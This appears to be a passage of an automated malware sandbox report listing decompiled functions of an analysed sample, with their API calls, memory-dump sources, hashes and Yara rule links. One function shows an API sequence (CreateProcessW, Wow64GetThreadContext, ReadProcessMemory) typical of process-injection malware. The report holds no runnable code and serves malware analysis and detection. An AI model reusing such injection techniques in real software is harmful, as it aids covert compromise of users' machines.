                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 0833d2bc4d7f4d1f3d4ff62134b7fb59c2041fd718bf1103333beb5859437de4
                                                                                                                                                    • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                                                                                                                    • Opcode Fuzzy Hash: 0833d2bc4d7f4d1f3d4ff62134b7fb59c2041fd718bf1103333beb5859437de4
                                                                                                                                                    • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                                                                                                                    Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                                                    • _strcat.LIBCMT ref: 0040F786
                                                                                                                                                      • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                                                      • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3199840319-0
                                                                                                                                                    • Opcode ID: bb46ec354e5f074944f6d6ffaaad758367fe0d935ff0e0da6eb4efd6d0eafcba
                                                                                                                                                    • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                                                    • Opcode Fuzzy Hash: bb46ec354e5f074944f6d6ffaaad758367fe0d935ff0e0da6eb4efd6d0eafcba
                                                                                                                                                    • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                                                    Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                                                    Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock_file.LIBCMT ref: 00415012
                                                                                                                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2999321469-0
                                                                                                                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                                                    Function 02F3129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 02F31ACD
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02F31AF1
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F31B13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                    • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                                                    • Instruction ID: 5910c64c6e008dde56f68090f18e8b373bb62a706b1bb805c906c45547512ad4
                                                                                                                                                    • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                                                    • Instruction Fuzzy Hash: 2712CE24E18658C6EB24DF64D8507DEB232EF68340F1090E9D10DEB7A5E77A4E81CF5A
                                                                                                                                                    Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 7d4bf282be97faa598aef49f35025b485b6d7313d47a9894d7d30610d981dab9
                                                                                                                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                                                    • Opcode Fuzzy Hash: 7d4bf282be97faa598aef49f35025b485b6d7313d47a9894d7d30610d981dab9
                                                                                                                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                                                    Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 7bcbe236245efc3dcbe4508d56e566c7f81f194657cd8416221797d331caa60f
                                                                                                                                                    • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                                                                                                    • Opcode Fuzzy Hash: 7bcbe236245efc3dcbe4508d56e566c7f81f194657cd8416221797d331caa60f
                                                                                                                                                    • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                                                                                                    Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4dcdcbe9ad79790a1096564f6089ef7e9ebf333e554a3dff892159d4d739e5a4
                                                                                                                                                    • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                                                    • Opcode Fuzzy Hash: 4dcdcbe9ad79790a1096564f6089ef7e9ebf333e554a3dff892159d4d739e5a4
                                                                                                                                                    • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                                                    Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3031932315-0
                                                                                                                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                                                    Function 004142B6 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock_file.LIBCMT ref: 004142F5
                                                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2597487223-0
                                                                                                                                                    • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                                                                                                    • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                                                                                                                                    • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                                                                                                    • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                                                                                                                                    Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wfsopen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 197181222-0
                                                                                                                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                                                    Function 00410CFC Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                                    Function 02F3229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 02F322B1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                    • Instruction ID: 52cc68fbe5ac9360015c3e04a5e73a8b6a0ed9faf9713594077b872739be9be3
                                                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                    • Instruction Fuzzy Hash: 6DE0BF7494010EEFDB00EFA8D9496DE7BB4FF04711F1005A1FD05D7680DB309E548A62
                                                                                                                                                    Function 02F322A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 02F322B1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction ID: 8afb7675e556e13baf09de65d3fe3b9bbf239873e52ac5280c48e838a7975eaa
                                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction Fuzzy Hash: 2BE0E67494010EDFDB00EFB8D94969E7FB4FF04701F100161FD01D2280D6309D508A72

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00A142E0,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00A142E0,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                                                    • SendMessageW.USER32 ref: 0047CD12
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                                                    • SendMessageW.USER32 ref: 0047CD80
                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                                                    • SendMessageW.USER32 ref: 0047CE93
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,02FB5FA0,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
